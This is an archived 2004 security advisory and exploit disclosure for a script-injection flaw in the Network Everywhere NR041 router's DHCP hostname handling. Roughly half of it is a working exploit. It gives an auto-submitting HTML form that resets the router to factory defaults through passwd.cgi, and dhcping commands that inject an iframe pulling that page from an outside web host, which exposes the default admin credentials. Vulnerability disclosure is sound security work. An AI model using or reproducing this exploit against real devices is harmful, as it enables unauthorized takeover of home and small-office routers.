NR041 Vulnerability

From n0v4 Wiki
Jump to: navigation, search

This page has been reproduced from here [1] for archival purposes.

Network Everywhere Router Lets Remote Users Inject Scripts Via DHCP Messages

SecurityTracker Alert ID: 1011066

SecurityTracker URL: http://securitytracker.com/id/1011066

CVE Reference: GENERIC-MAP-NOMATCH

Date: Aug 25 2004

Impact: Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network

Exploit Included: Yes

Version(s): firmware rev 1.2 Release 03; Model NR041

Description: A vulnerability was reported in the Network Everywhere NR041 router. A remote user can conduct scripting attacks against the administrator.

Mathieu Lacroix reported that the router does not filter user-supplied input in the DHCP HOSTNAME option when displaying information on the administrative interface. A remote user can inject scripting code into a DHCP HOSTNAME option to cause arbitrary scripting code to be executed when a target user views the interface.

The remote user must have access to the internal interface, the report said.

The vendor was reportedly notified on August 13, 2004, wihtout response.

Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the device, access data recently submitted by the target user via web form to the device, or take actions on the device acting as the target user.

Solution: No solution was available at the time of this entry.

Vendor URL: www.networkeverywhere.com/products/nr041.asp (Links to External Site)

Cause: Input validation error

Date:  Wed, 25 Aug 2004 01:29:37 -0400
Subject:  bug found

NetworkEverywhere  router  Model NR041 (latest firmware rev 1.2 Release 03)
suffers a "script injection over dhcp" vulnerability.

The NR041 does not filter DHCP HOSTNAME options coming from its clients.
Because of that, we can inject a web script into the web based
administrative interface and wait until the administrator consults the DHCP
interface after what the injected script is executed within the open session
and therefore with full access on the router. This exploit allows a
malicious user to reset the box's factory setting, restoring the default
password, in this case:
Administrator: none
Password: admin.

 NR041's dhcp daemon is reachable from the inside and offers no wireless
access therefore this flaw is not easy to exploit but still, a successful
exploitation will have critical impact.

 EXPLOITATION: (using DHCPing available at
http://c3rb3r.openwall.net/dhcping/):


As mentioned above,  NR041 is configurable via a web based administrative
interface using several cgis and invoked with the HTTP POST method.
It's not easy to write a useful script in 15 characters when you can't break
the string wherever you wish, the same 'id="' trick used for exploitation of
the DLINK 614+ will be valuable here.


STEP1:

Because we don't have enough room to exploit the router in one shot, we will
inject an iframe into the router to force the administrator to remotely call
"a.htm" on the malicious web site.
"a.htm"  contains a form which auto-submit itself when loaded.
First of all, place the following code on the web server and choose a
one-character name to save place. This code is installed on the remote
malicious site and contains the actual attack (a call to passwd.cgi with
factorydefaults enabled).
Note that we have hard-coded the router ip (192.168.1.1) in this script (we
can dynamically get it from the HTTP referer header) so change it
accordingly to your configuration.

<html><head>
<script language="JavaScript">
<!--
function SymError()
{
  return true;
}
window.onerror = SymError;
//-->
</script>
<script language="javascript">
function autopost(){
}
</script>
</head><body onload="javascript:document.xx.submit();">
<form name=xx method=post action="http://192.168.1.1/passwd.cgi">
<input type=hidden name=FactoryDefaults value="Enable">
</form>
</body></html>



STEP2:

Inject our script into the router using DHCPing :

dhcping -optleasetime 3600 -opttype discover -optreqip
192.168.1.121 -opthostname "/../a.htm' > " -m af:af:af:af:af:af

dhcping -optleasetime 3600 -opttype discover -optreqip
192.168.1.122 -opthostname "'src='//url.ca/" -m af:af:af:af:af:ae

dhcping -optleasetime 3600 -opttype discover -optreqip
192.168.1.123 -opthostname
"<iframe id=' " -m af:af:af:af:af:ad

(Tested with a Mozilla browser)


PROBLEM: Unfortunately we are limited in space for the malicious URL making
all of this a bit tricky but other means of exploitation may be possible.

Have a nice test ;-)


VENDOR:

NetworkEverywhere support staff has been contacted on August 13th but didn't
reply to my email.

VULNERABLE:

Product Release Date : September 6, 2002
Current Firmware : Version 1.2 Release 03 (latest)
Firmware Date    : May 5, 2003


AUTHOR:

Mathieu Lacroix (Daemonz at videotron.ca)
Thanks to Gregory Duchemin and DHCPing (available at
http://c3rb3r.openwall.net/dhcping/)